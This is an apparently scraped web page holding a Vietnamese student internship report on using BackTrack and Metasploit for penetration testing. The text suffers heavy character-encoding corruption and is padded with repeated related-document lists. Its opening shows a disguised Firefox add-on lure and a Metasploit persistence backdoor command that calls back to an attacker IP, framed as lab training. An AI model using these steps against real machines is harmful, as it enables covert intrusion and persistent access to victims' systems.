Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 22 SVTH: Nguyá»…n Văn Tiến Tiếp theo là chúng ta đặt tên cho addon để nạn nhân tưởng đây là addon của firefox : “set addonname [tên addon]. ÄÆ°á»ng dẫn chứa file addon đó “set uripath /†và sá»­ dụng exploit để bắt đầu lắng nge. Sau khi exploit thì nó tạo ra 1 Ä‘Æ°á»ng dẫn. Nếu nạn nhân sá»­ dụng firefox truy cập vào Ä‘Æ°á»ng dẫn này và cài add on thì sẽ có 1 kết nối đến Honeypot. Có 1 sesions đã được mở.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 23 SVTH: Nguyá»…n Văn Tiến “Sessions –i 1†để kết nối đến máy nạn nhân. Và chúng ta đã chiếm được hệ thống của nạn nhân. 3. Backdoor Backdoor là má»™t chÆ°Æ¡ng trình được hacker cài vào máy tính nạn nhân có thể truy cập vào thá»i gian sau cho dù lần xâm nhập trÆ°á»›c đó đã bị phát hiện. Cách thá»±c hiện: Tạo thêm má»™t dịch vụ má»›i có tên “rất hệ thốngâ€, gỡ bá» má»™t dịch vụ ít sá»­ dụng và cài backdoor vá»›i chính tên đó. Sauk hi chúng ta chiếm được quyá»n hệ thống và muốn lần sau máy nạn nhân sẽ tá»± kết nối đến mà không phải tốn thá»i gian khai tấn công nhÆ° thế nữa. Chúng ta sá»­ dụng backdoor có sẳn trên Metasploit là persistence. Xem các trợ giúp của backdoor persistence bằng lệnh: “run persistence –hâ€
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 24 SVTH: Nguyá»…n Văn Tiến Tiếp theo ta thá»±c hiện : “run persistence –A –U -1 10 –p 443 –r [ip của attacker] Và ta thấy có thêm 1 sessions đã được tạo ra. Ta thoát khá»i sessions. Khi má»—i lần nạn nhân mở máy lên thì sẽ có 1 sesions má»›i được tạo ra.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 25 SVTH: Nguyá»…n Văn Tiến Bây giá» ta có thể khai thác trên máy nạn nhân.

Recommended

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyBao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
hoaihuysc
Ìý
Phan cÆ°á»ng
Phan cÆ°á»ngPhan cÆ°á»ng
Phan cÆ°á»ng
CÆ°á»ng Phan
Ìý
µþá´Ç Cáo Thá»±c Tập- Athena
µþá´Ç Cáo Thá»±c Tập- Athenaµþá´Ç Cáo Thá»±c Tập- Athena
µþá´Ç Cáo Thá»±c Tập- Athena
quocluong
Ìý
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
Luan Dt
Ìý
zombie-botnet (dongcatchay)
zombie-botnet (dongcatchay)zombie-botnet (dongcatchay)
zombie-botnet (dongcatchay)
Luân Nguyễn Văn
Ìý
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
Long VÅ©
Ìý
Bao cao hoai huy
Bao cao hoai huyBao cao hoai huy
Bao cao hoai huy
hoaihuysc
Ìý
µþá´Ç cáo thá»±c tập - Quốc Nghị
µþá´Ç cáo thá»±c tập - Quốc Nghịµþá´Ç cáo thá»±c tập - Quốc Nghị
µþá´Ç cáo thá»±c tập - Quốc Nghị
blue_abc
Ìý
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
Quoc Viet Huynh
Ìý
Bao cao athena
Bao cao athenaBao cao athena
Bao cao athena
Trần Hán Minh
Ìý
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
TranQuangChien
Ìý
Athena
AthenaAthena
Athena
BiBi MrLai
Ìý
µþá´Ç cáo athena
µþá´Ç cáo athenaµþá´Ç cáo athena
µþá´Ç cáo athena
Chung Thuận
Ìý
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athena
quocluong
Ìý
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutaiµþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
Tai Ly
Ìý
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
Äàm Văn Sáng
Ìý
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
Nat Galacticos
Ìý
µþá´Ç cáo thá»±c tập athena 1
µþá´Ç cáo thá»±c tập athena 1µþá´Ç cáo thá»±c tập athena 1
µþá´Ç cáo thá»±c tập athena 1
Ngan Nguyen
Ìý
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyếnÄồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Aubrey Yundt
Ìý
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
ice_eyes
Ìý
Linux web hosting (Bao cao)
Linux web hosting (Bao cao)Linux web hosting (Bao cao)
Linux web hosting (Bao cao)
An Pham
Ìý
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
Phạm Trung Äức
Ìý
Bctt
BcttBctt
Bctt
LIL55
Ìý
µþá´Ç cáo thá»±c tập công ty ATHENA.
µþá´Ç cáo thá»±c tập công ty ATHENA.µþá´Ç cáo thá»±c tập công ty ATHENA.
µþá´Ç cáo thá»±c tập công ty ATHENA.
Tân Duy
Ìý
µþá´Ç cáo thá»±c tập Athena -CNTT
µþá´Ç cáo thá»±c tập Athena -CNTTµþá´Ç cáo thá»±c tập Athena -CNTT
µþá´Ç cáo thá»±c tập Athena -CNTT
Pac CE
Ìý
TÆ°á»ng lá»­a ip cop
TÆ°á»ng lá»­a ip copTÆ°á»ng lá»­a ip cop
TÆ°á»ng lá»­a ip cop
Trần Văn Quyết
Ìý
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
Tan Huynh
Ìý
Bia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi kiBia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi ki
Hình Vô
Ìý

More Related Content

Similar to µþá´Ç cáo cuối kỳ (20)

Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
Quoc Viet Huynh
Ìý
Bao cao athena
Bao cao athenaBao cao athena
Bao cao athena
Trần Hán Minh
Ìý
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
TranQuangChien
Ìý
Athena
AthenaAthena
Athena
BiBi MrLai
Ìý
µþá´Ç cáo athena
µþá´Ç cáo athenaµþá´Ç cáo athena
µþá´Ç cáo athena
Chung Thuận
Ìý
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athena
quocluong
Ìý
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutaiµþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
Tai Ly
Ìý
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
Äàm Văn Sáng
Ìý
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
Nat Galacticos
Ìý
µþá´Ç cáo thá»±c tập athena 1
µþá´Ç cáo thá»±c tập athena 1µþá´Ç cáo thá»±c tập athena 1
µþá´Ç cáo thá»±c tập athena 1
Ngan Nguyen
Ìý
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyếnÄồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Aubrey Yundt
Ìý
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
ice_eyes
Ìý
Linux web hosting (Bao cao)
Linux web hosting (Bao cao)Linux web hosting (Bao cao)
Linux web hosting (Bao cao)
An Pham
Ìý
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
Phạm Trung Äức
Ìý
Bctt
BcttBctt
Bctt
LIL55
Ìý
µþá´Ç cáo thá»±c tập công ty ATHENA.
µþá´Ç cáo thá»±c tập công ty ATHENA.µþá´Ç cáo thá»±c tập công ty ATHENA.
µþá´Ç cáo thá»±c tập công ty ATHENA.
Tân Duy
Ìý
µþá´Ç cáo thá»±c tập Athena -CNTT
µþá´Ç cáo thá»±c tập Athena -CNTTµþá´Ç cáo thá»±c tập Athena -CNTT
µþá´Ç cáo thá»±c tập Athena -CNTT
Pac CE
Ìý
TÆ°á»ng lá»­a ip cop
TÆ°á»ng lá»­a ip copTÆ°á»ng lá»­a ip cop
TÆ°á»ng lá»­a ip cop
Trần Văn Quyết
Ìý
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
Tan Huynh
Ìý
Bia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi kiBia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi ki
Hình Vô
Ìý
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
Quoc Viet Huynh
Ìý
Bao cao athena
Bao cao athenaBao cao athena
Bao cao athena
Trần Hán Minh
Ìý
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
TranQuangChien
Ìý
Athena
AthenaAthena
Athena
BiBi MrLai
Ìý
µþá´Ç cáo athena
µþá´Ç cáo athenaµþá´Ç cáo athena
µþá´Ç cáo athena
Chung Thuận
Ìý
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athena
quocluong
Ìý
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutaiµþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
µþá´Ç cáo thá»±c tập windows server 2008 gia dinh ly huutai
Tai Ly
Ìý
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
µþá´Ç cáo cuối kỳ - Ä‘á» tài "nghiên cứu cÆ¡ chế routing của cisco mô phá»ng trên ...
Äàm Văn Sáng
Ìý
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
Nat Galacticos
Ìý
µþá´Ç cáo thá»±c tập athena 1
µþá´Ç cáo thá»±c tập athena 1µþá´Ç cáo thá»±c tập athena 1
µþá´Ç cáo thá»±c tập athena 1
Ngan Nguyen
Ìý
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyếnÄồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Äồ án Xây dá»±ng website ná»™p đồ án trá»±c tuyến
Aubrey Yundt
Ìý
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
ice_eyes
Ìý
Linux web hosting (Bao cao)
Linux web hosting (Bao cao)Linux web hosting (Bao cao)
Linux web hosting (Bao cao)
An Pham
Ìý
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
Phạm Trung Äức
Ìý
Bctt
BcttBctt
Bctt
LIL55
Ìý
µþá´Ç cáo thá»±c tập công ty ATHENA.
µþá´Ç cáo thá»±c tập công ty ATHENA.µþá´Ç cáo thá»±c tập công ty ATHENA.
µþá´Ç cáo thá»±c tập công ty ATHENA.
Tân Duy
Ìý
µþá´Ç cáo thá»±c tập Athena -CNTT
µþá´Ç cáo thá»±c tập Athena -CNTTµþá´Ç cáo thá»±c tập Athena -CNTT
µþá´Ç cáo thá»±c tập Athena -CNTT
Pac CE
Ìý
TÆ°á»ng lá»­a ip cop
TÆ°á»ng lá»­a ip copTÆ°á»ng lá»­a ip cop
TÆ°á»ng lá»­a ip cop
Trần Văn Quyết
Ìý
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
Tan Huynh
Ìý
Bia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi kiBia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi ki
Hình Vô
Ìý

µþá´Ç cáo cuối kỳ

  • 1. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | i SVTH: Nguyá»…n Văn Tiến TRÃCH YẾU Hiện nay trong thá»i đại công nghệ thông tin vấn Ä‘á» an toàn và bảo mật thông tin của má»i cá nhân, doanh nghiệp, cÆ¡ quan, tổ chức … được quan tâm hàng đầu. Do việc nhu cầu trao đổi thông tin giữa các cá nhân, tổ chức … ngày càng cao vì vậy vấn Ä‘á» bảo mật là rất cần thiết. Nếu an ninh mạng không được quan tâm đúng mức sẽ có nhiá»u vấn Ä‘á» nghiêm trá»ng xảy ra nhÆ° xâm nhập bất hợp pháp, đánh cấp dữ liệu, tấn công, lừa đảo… Má»™t trong những cách để hạn chế những vấn đỠđó là luôn kiểm tra hệ thống, cài đặt phần má»m có license, cài đặt các bản vá… Trong thá»i gian thá»±c tập 8 tuần từ ngày 12/05/2014 đến ngày 05/07/2014 tôi đã hoàn thành đồ án “ Nghiên cứu và sá»­ dụng Backtrack để kiểm tra an ninh mạngâ€. Quá trình thá»±c tập giúp tôi hiểu được vá» công việc của những ngÆ°á»i kiểm tra hệ thống mạng và tôi có thể vận dụng những kiến thức đã được há»c vào thá»±c tế. Bên cạnh đó, tôi há»c há»i được nhiá»u thứ trong cuá»™c sống từ các bạn thá»±c tập chung và đặt biệt biệt là thầy Võ Äá»— Thắng. Tôi cam kết kết quả của đồ án là do tôi thá»±c hiện dÆ°á»›i sá»± hÆ°á»›ng dẫn của thầy Võ Äá»— Thắng(Giám đốc Trung tâm đào tạo Quản trị mạng và an ninh mạng Quốc tế Athena) không sao chép của ngÆ°á»i khác. Các bÆ°á»›c của quá trình thá»±c hiện được ghi lại bằng những Ä‘oạn phim ngắn và có thuyết minh. Danh sách các Ä‘oạn phim: Cài đặt Backtrack 5R3 https://www.youtube.com/watch?v=etNV0jf7sFk Các công cụ thu thập thông tin: https://www.youtube.com/watch?v=CePaGIHRhog Khai thác lổ há»ng MS08_067: https://www.youtube.com/watch?v=t0t8A0OPtoU Khai thác lổ há»ng MS12_020: https://www.youtube.com/watch?v=ZArVYCUj9BU Khai thác lổ há»ng MS12_027: https://www.youtube.com/watch?v=yLHvLe-olOM Cài Metasploit trên VPS: https://www.youtube.com/watch?v=YMqkg3duLQ8 Khai thác lá»— há»ng của firefox_xpi_bootstrapped qua mạng internet có sá»­ dụng backdoor: https://www.youtube.com/watch?v=4oNY9pUmeb0
  • 2. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | ii SVTH: Nguyá»…n Văn Tiến MỤC LỤC ChÆ°Æ¡ng Mở Äầu: GIỚI THIỆU VỀ BACKTRACK.........................................1 I. Giá»›i thiệu .................................................................................................1 II. Cài đặt......................................................................................................1 ChÆ°Æ¡ng 1: THU THẬP THÔNG TIN VÀ KHAI THÃC Lá»– HỎNG CỦA HỆ ÄIỀU HÀNH WINDOWS TRONG MẠNG LAN.........................................................4 I. Giá»›i thiệu .................................................................................................4 II. Thu thập thông tin....................................................................................5 1. Liệt kê dịch vụ......................................................................................5 2. Xác định phạm vi mạng........................................................................5 3. Xác định host có Ä‘ang mở hay không ..................................................6 4. Các dịch vụ...........................................................................................6 5. Xác Ä‘inh hệ Ä‘iá»u hành..........................................................................6 6. Nhận diện các dịch vụ ..........................................................................7 7. Äánh giá các mối Ä‘e dá»a ......................................................................7 III. Khai thác lá»— há»ng qua mạng Lan.............................................................8 1. Khai thác lá»— há»ng MS08_067...............................................................8 2. Khai thác lá»— há»ng MS12_020.............................................................11 3. Khai thác lá»— há»ng MS12_027.............................................................13 ChÆ°Æ¡ng 2: XÂY Dá»°NG HONEYPOT ÄỂ XÂM NHẬP QUA MẠNG INTERNET 17 I. Giá»›i thiệu vá» Honeypot..........................................................................17 II. Xâm nhập qua mạng internet bằng Honeypot .......................................17 1. Cài đặt Metasploit trên VPS...............................................................17 2. Khai thác qua mạng internet...............................................................21 3. Backdoor.............................................................................................23
  • 3. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | iii SVTH: Nguyá»…n Văn Tiến Lá»i Cảm Æ n Khoa Công Nghệ Thông Tin và Truyá»n Thông TrÆ°á»ng Äại há»c Cần ThÆ¡ Em xin chân thành cảm Æ¡n Khoa Công nghệ thông tin và Truyá»n thông trÆ°á»ng Äại há»c Cần ThÆ¡ đã tạo Ä‘iá»u kiện cho em hoàn thành tốt đợt thá»±c tập thá»±c tế này. Trong đợt thá»±c tập này đã giúp em có nhiá»u kinh nghiệm thá»±c tế trong há»c tập và cuá»™c sống. Những kinh nghiệm đó sẽ giúp em hiểu rõ và định hÆ°á»›ng cho công việc sau này. Bên cạnh đó, em xin cảm Æ¡n các Thầy Cô khoa CNTT&TT đã tận tình giảng dạy và trang bị cho em những kiến thức cần thiết và há»— trợ cho em hoàn thành Ä‘á» tài này. Trong quá trình thá»±c tập thá»±c tế đã hoàn thành nhÆ°ng không tránh khá»i những phần sai sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn thiện hÆ¡n trong công việc và cuá»™c sống. Em xin chân thành cảm Æ¡n! Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014 Sinh viên thá»±c tập Nguyá»…n Văn Tiến
  • 4. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | iv SVTH: Nguyá»…n Văn Tiến Lá»i Cảm Æ¡n Trung Tâm Äào Tạo Quản Trị Mạng và An Ninh Mạng Quốc tế ATHENA Em xin chân thành cảm Æ¡n Trung tâm đào tạo Quản trị mạng và An ninh mạng Quốc tế Athena đã tạo Ä‘iá»u kiện cho em thá»±c tập thá»±c tế nÆ¡i đây. Em đã nhận được sá»± há»— trợ nhiệt tình vá» cÆ¡ sở vật chất cÅ©ng nhÆ° chuyên môn. Em xin bày tá» lòng biết Æ¡n đến quý Thầy Cô của trung tâm,đặt biệt là thầy Võ Äá»— Thắng đã chỉ dạy tận tình giúp em hoàn thành Ä‘á» tài này. Trong quá trình thá»±c tập thá»±c tế đã hoàn thành nhÆ°ng không tránh khá»i những phần sai sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn thiện hÆ¡n trong công việc và cuá»™c sống. Em xin chân thành cảm Æ¡n! Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014 Sinh viên thá»±c tập Nguyá»…n Văn Tiến
  • 5. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | v SVTH: Nguyá»…n Văn Tiến Giáo viên hÆ°á»›ng dẫn thầy Võ Äá»— Thắng(phải) và sinh viên thá»±c tập Nguyá»…n Văn Tiến
  • 6. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | vi SVTH: Nguyá»…n Văn Tiến NHẬN XÉT CỦA GIÃO VIÊN ---------oo0oo--------- ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. .................................................................................................................................
  • 7. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | vii SVTH: Nguyá»…n Văn Tiến GIỚI THIỆU TRUNG TÂM ATHENA 1. Giá»›i thiệu Trung Tâm Äào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là má»™t tổ chức qui tụ nhiá»u trí thức trẻ Việt Nam đầy năng Ä‘á»™ng, nhiệt huyết và kinh nghiệm trong lãnh vá»±c CNTT, vá»›i tâm huyết góp phần vào công cuá»™c thúc đẩy tiến trình Ä‘Æ°a công nghệ thông tin là ngành kinh tế mÅ©i nhá»n, góp phần phát triển nÆ°á»›c nhà . 2. LÄ©nh vá»±c hoạt Ä‘á»™ng Trung tâm ATHENA đã và Ä‘ang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thÆ°Æ¡ng mại Ä‘iện tá»­ theo các tiêu chuẩn quốc tế của các hãng nổi tiếng nhÆ° Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chÆ°Æ¡ng trình đào tạo cao cấp dành riêng theo Ä‘Æ¡n đặt hàng của các Ä‘Æ¡n vị nhÆ° Bá»™ Quốc Phòng, Bá»™ Công An , ngân hàng, doanh nghiệp, các cÆ¡ quan chính phủ, tổ chức tài chính… Sau gần 10 năm hoạt Ä‘á»™ng,nhiá»u há»c viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiá»u bá»™ ngành nhÆ° Cục Công Nghệ Thông Tin - Bá»™ Quốc Phòng , Bá»™ Công An, Sở Thông Tin Truyá»n Thông các tỉnh, bÆ°u Ä‘iện các tỉnh,… Ngoài chÆ°Æ¡ng trình đào tạo, Trung tâm ATHENA còn có nhiá»u chÆ°Æ¡ng trình hợp tác và trao đổi công nghệ vá»›i nhiá»u đại há»c lá»›n nhÆ° đại há»c Bách Khoa Thành Phố Hồ CHính Minh, Há»c Viện An Ninh Nhân Dân( Thủ Äức), Há»c Viện BÆ°u Chính Viá»…n Thông, Hiệp há»™i an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sá»± ,... 3. Äá»™i ngÅ© giảng viên Tất cả các giảng viên trung tâm ATHENA có Ä‘á»u tốt nghiệp từ các trÆ°á»ng đại há»c hàng đầu trong nÆ°á»›c .... Tất cả giảng viên ATHENA Ä‘á»u phải có các chứng chỉ quốc tế nhÆ° MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sÆ° phạm Quốc tế (Microsoft Certified Trainer). Äây là các chứng chỉ chuyên môn bắt buá»™c để đủ Ä‘iá»u kiện tham gia giảng dạy tại trung tâm ATHENA.
  • 8. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | viii SVTH: Nguyá»…n Văn Tiến Bên cạnh đó, các giảng viên ATHENA thÆ°á»ng Ä‘i tu nghiệp và cập nhật kiến thức công nghệ má»›i từ các nÆ°á»›c tiên tiến nhÆ° Mỹ , Pháp, Hà Lan, Singapore,... và truyá»n đạt các công nghệ má»›i này trong các chÆ°Æ¡ng trình đào tạo tại trung tâm ATHENA. 4. CÆ¡ sở vật chất Thiết bị đầy đủ và hiện đại. ChÆ°Æ¡ng trình cập nhật liên tục, bảo đảm há»c viên luôn tiếp cận vá»›i những công nghệ má»›i nhất. Phòng máy rá»™ng rãi, thoáng mát. 5. Dịch vụ Äảm bảo việc làm cho há»c viên tốt nghiệp khoá dài hạn. Giá»›i thiệu việc làm cho má»i há»c viên. Thá»±c tập có lÆ°Æ¡ng cho há»c viên khá giá»i. Ngoài giá» há»c chính thức, há»c viên được thá»±c hành thêm miá»…n phí, không giá»›i hạn thá»i gian. Há»— trợ kỹ thuật không thá»i hạn trong tất cả các lÄ©nh vá»±c liên quan đến máy tính, mạng máy tính, bảo mật mạng. Há»— trợ thi Chứng chỉ Quốc tế. 6. Liên hệ CÆ¡ sở 1: 92 Nguyá»…n Äình Chiểu, phÆ°á»ng Äa Kao, Quận 1. Äiện thoại: 090 78 79 477 - 094 323 00 99 - (08)38244041. CÆ¡ sở 2: 2 Bis Äinh Tiên Hoàng, phÆ°á»ng Äa Kao, Quận 1. Äiện thoại: 094 320 00 88 - (08)22 10 38 01. Website: http://athena.edu.vn - http://athena.com.vn E-mail : support@athena.edu.vn - tuvan@athena.edu.vn
  • 9. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 1 SVTH: Nguyá»…n Văn Tiến ChÆ°Æ¡ng Mở Äầu: GIỚI THIỆU VỀ BACKTRACK I. Giá»›i thiệu Backtrack là má»™t bản phân phối dạng Live DVD của Linux, được phát triển để thá»­ nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sá»­ dụng có thể Backtrack trá»±c tiếp từ Ä‘Ä©a DVD mà không cần cài nó vào máy của bạn. Backtrack cÅ©ng có thể được cài đặt vào ổ cứng và sá»­ dụng nhÆ° má»™t hệ Ä‘iá»u hành. Backtrack là sá»± hợp nhất giữa 3 bản phân phối khác nhau của Linux vá» thâm nhập thá»­ nghiệm -IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện là Backtrack 5R3 được phát hành vào tháng 8 năm 2012 bổ sung hÆ¡n 60 công cụ má»›i. Má»™t số thay đổi đáng chú ý bao gồm các công cụ thá»­ nghiệm xâm nhập Ä‘iện thoại di Ä‘á»™ng, giao diện đồ há»a cho công cụ crack- wifi, má»™t thể loại hoàn toàn má»›i là công cụ khai thác vật lý. II. Cài đặt Nếu chúng ta muốn sá»­ dụng Backtrack mà không cần cài nó vào ổ cứng hay Live DVD, chúng ta có thể ghi tập tin ảnh ISO vào Ä‘Ä©a DVD và khởi Ä‘á»™ng máy tính của bạn vá»›i DVD. Backtrack sau đó sẽ chạy từ Ä‘Ä©a DVD. Lợi thế của việc sá»­ dụng Backtrack là má»™t DVD Live là nó là rất dá»… dàng. Tuy nhiên, phÆ°Æ¡ng pháp này cÅ©ng có má»™t số nhược Ä‘iểm. Backtrack có thể không làm việc vá»›i phần cứng và thay đổi cấu hình nào được thá»±c hiện trên phần cứng để làm việc sẽ không được lÆ°u vá»›i Ä‘Ä©a DVD Live. Ngoài ra, nó là chậm vì máy tính cần phải tải các chÆ°Æ¡ng trình từ Ä‘Ä©a DVD. Cài đặt trong máy ảo. Äiểm thuận lợi là chúng ta có thể dá»… dàng sá»­ dụng Backtrack vá»›i hệ Ä‘iá»u hành hiện tại. Khuyết Ä‘iểm là tốc Ä‘á»™ chậm, không dùng được wireless trừ USB wireless. Ở đây tôi cài Backtrack 5R3 trên máy ảo VMWare. Sau đây là má»™t số hình ảnh khi cài đặt Backtrack 5R3 Tạo máy ảo Backtrack
